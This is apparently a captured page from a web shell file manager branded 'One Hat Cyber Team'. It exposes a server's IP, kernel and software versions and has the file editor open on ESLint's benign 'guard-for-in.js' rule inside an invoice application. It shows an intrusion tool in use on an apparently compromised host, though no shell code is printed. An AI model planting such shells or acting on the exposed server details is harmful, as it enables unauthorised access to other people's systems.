⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
eslint
/
lib
/
rules
/
Edit File: guard-for-in.js
/** * @fileoverview Rule to flag for-in loops without if statements inside * @author Nicholas C. Zakas */ "use strict"; //------------------------------------------------------------------------------ // Rule Definition //------------------------------------------------------------------------------ module.exports = { meta: { type: "suggestion", docs: { description: "require `for-in` loops to include an `if` statement", category: "Best Practices", recommended: false, url: "https://eslint.org/docs/rules/guard-for-in" }, schema: [], messages: { wrap: "The body of a for-in should be wrapped in an if statement to filter unwanted properties from the prototype." } }, create(context) { return { ForInStatement(node) { const body = node.body; // empty statement if (body.type === "EmptyStatement") { return; } // if statement if (body.type === "IfStatement") { return; } // empty block if (body.type === "BlockStatement" && body.body.length === 0) { return; } // block with just if statement if (body.type === "BlockStatement" && body.body.length === 1 && body.body[0].type === "IfStatement") { return; } // block that starts with if statement if (body.type === "BlockStatement" && body.body.length >= 1 && body.body[0].type === "IfStatement") { const i = body.body[0]; // ... whose consequent is a continue if (i.consequent.type === "ContinueStatement") { return; } // ... whose consequent is a block that contains only a continue if (i.consequent.type === "BlockStatement" && i.consequent.body.length === 1 && i.consequent.body[0].type === "ContinueStatement") { return; } } context.report({ node, messageId: "wrap" }); } }; } };
Simpan